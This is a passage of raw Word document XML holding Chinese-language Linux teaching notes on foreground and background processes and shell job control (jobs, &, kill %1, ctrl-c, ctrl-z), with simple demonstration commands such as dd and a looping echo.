        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前台进程和后台进程详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA244D" w14:textId="77777777" w:rsidR="006368DA" w:rsidRDefault="006368DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6632E274" w14:textId="61FCF3F2" w:rsidR="00877EE0" w:rsidRDefault="004929B0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业</w:t>
      </w:r>
      <w:r w:rsidR="00354548">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00354548">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidR="00354548">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调度（本质仍然是进程）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C35F918" w14:textId="6A81A2EF" w:rsidR="003D4138" w:rsidRDefault="003D4138" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为单位的，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立的作业，不会被另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到（包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是仍然可以看到作业对应的进程）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D1216" w14:textId="77777777" w:rsidR="004929B0" w:rsidRPr="003D4138" w:rsidRDefault="004929B0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C48B13C" w14:textId="0B5434D6" w:rsidR="005B6C44" w:rsidRDefault="005B6C44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前台进程</w:t>
      </w:r>
      <w:r w:rsidR="00D530D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00D530D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>front</w:t>
      </w:r>
      <w:r w:rsidR="00D530D4">
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidR="00D530D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C87E2" w14:textId="291E52A6" w:rsidR="005B6C44" w:rsidRDefault="00312BA3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aux | grep cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6945A1EC" w14:textId="58A5D50E" w:rsidR="00312BA3" w:rsidRDefault="00312BA3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3945CDCE" w14:textId="66FD64FF" w:rsidR="005B6C44" w:rsidRDefault="005B6C44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBBBD4B" w14:textId="77777777" w:rsidR="005B6C44" w:rsidRDefault="005B6C44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B27D25C" w14:textId="77777777" w:rsidR="005B6C44" w:rsidRDefault="005B6C44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3C6D89" w14:textId="4A9AF101" w:rsidR="005B6C44" w:rsidRDefault="005B6C44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台进程</w:t>
      </w:r>
      <w:r w:rsidR="00D530D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D530D4">
        <w:t>background process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10027915" w14:textId="77777777" w:rsidR="006368DA" w:rsidRDefault="006368DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77378901" w14:textId="600E3E4F" w:rsidR="006368DA" w:rsidRDefault="005C6A47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>d if=/dev/zero of=/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>oot/test-file bs=1M count=2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A7B17" w14:textId="77777777" w:rsidR="005C6A47" w:rsidRDefault="005C6A47" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3033BAB4" w14:textId="2B7E10A1" w:rsidR="006368DA" w:rsidRDefault="00971284" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将命令放在后台，只需要在命令后面打</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B385828" w14:textId="69C5235B" w:rsidR="00971284" w:rsidRDefault="00BB30A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AEA3F96" wp14:editId="490D96E2">
            <wp:extent cx="5274310" cy="516890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2006007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007276" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="516890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4347F3B0" w14:textId="4163EEFD" w:rsidR="00BB30A6" w:rsidRDefault="00BB30A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按个回车会看到有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E479735" w14:textId="49AE6AE7" w:rsidR="006368DA" w:rsidRDefault="00BB30A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7D1756" wp14:editId="2280FE74">
            <wp:extent cx="5274310" cy="410210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="724671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71502" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="410210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C032AE" w14:textId="1756ED5C" w:rsidR="006368DA" w:rsidRDefault="002C5F55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CDC9957" wp14:editId="24B120AE">
            <wp:extent cx="5274310" cy="1142365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="858189041"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89041" name="图片 1" descr="图表, 散点图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1142365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594B48D" w14:textId="77777777" w:rsidR="006368DA" w:rsidRDefault="006368DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035B1385" w14:textId="135E2422" w:rsidR="006368DA" w:rsidRDefault="002C5F55" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作业调度详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C886D7E" w14:textId="55F4BDE6" w:rsidR="006368DA" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以看到作业</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340343D6" w14:textId="46195DFB" w:rsidR="007133F7" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里敲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令是看不到的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C02870" w14:textId="598137FB" w:rsidR="007133F7" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为单位的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C537B1" w14:textId="77777777" w:rsidR="007133F7" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE547D2" w14:textId="54418E74" w:rsidR="007133F7" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个阉割版的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只能看到当前</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行的后台进程，通过</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来管理后台进程。</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidR="00E370B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能有限，管理范围有限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B18231" w14:textId="7EA46BE0" w:rsidR="00E370B9" w:rsidRDefault="00E370B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理后台进程，也是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，只不过，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令本身也可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5A549" w14:textId="77777777" w:rsidR="007133F7" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D60ADB6" w14:textId="77777777" w:rsidR="007133F7" w:rsidRDefault="007133F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EAD7513" w14:textId="6683458A" w:rsidR="006368DA" w:rsidRDefault="008E3C77" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> %1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A580F" w14:textId="23273250" w:rsidR="008E3C77" w:rsidRDefault="008E3C77" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思是，杀掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号人物。加个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意思就是杀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79677E12" w14:textId="77777777" w:rsidR="008E3C77" w:rsidRDefault="008E3C77" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00ADA17B" w14:textId="1C5C9785" w:rsidR="008E3C77" w:rsidRDefault="007D252A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是所有进程都适合作为后台进程，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidR="00996BCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，本来就是显示在前端让人看的，没有理由放在后台。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AE67F" w14:textId="77777777" w:rsidR="006368DA" w:rsidRDefault="006368DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EFA521C" w14:textId="0F3B0BE7" w:rsidR="006368DA" w:rsidRDefault="006E539D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何判断一个进程是否应该放在后台运行？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478257DA" w14:textId="586F8751" w:rsidR="006E539D" w:rsidRDefault="006E539D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、运行时间较长，用户不想在前台等待，该进程可以运行结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342A3F3" w14:textId="602F79B4" w:rsidR="006E539D" w:rsidRDefault="006E539D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、服务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），用户想让其永远处于运行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04434E45" w14:textId="3E66F3F2" w:rsidR="006E539D" w:rsidRDefault="006E539D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A82B4A" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /dev/zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91A467" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5CDA2F" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>hile (true); do echo teacher geng is very good; sleep 1; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B23F4" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个前台进程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就结束了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1026A6" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRPr="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC7AF97" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2536161D" w14:textId="7EFEDF74" w:rsidR="006C5033" w:rsidRDefault="006E539D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前台进程和后台进程之间的转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED0F13" w14:textId="538E2B6F" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>停止该进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE88563" w14:textId="0739ADB9" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> z</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将该进程放入后台</w:t>
      </w:r>
      <w:r w:rsidR="005B0975">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该进程的状态变为</w:t>
      </w:r>
      <w:r w:rsidR="005B0975">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r w:rsidR="005B0975">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果想继续运行这个进程，需要使用</w:t>
      </w:r>
      <w:r w:rsidR="005B0975">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r w:rsidR="005B0975">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令发送让该进程继续运行的信号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE1569" w14:textId="18A7A079" w:rsidR="00B9708F" w:rsidRDefault="005B0975" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
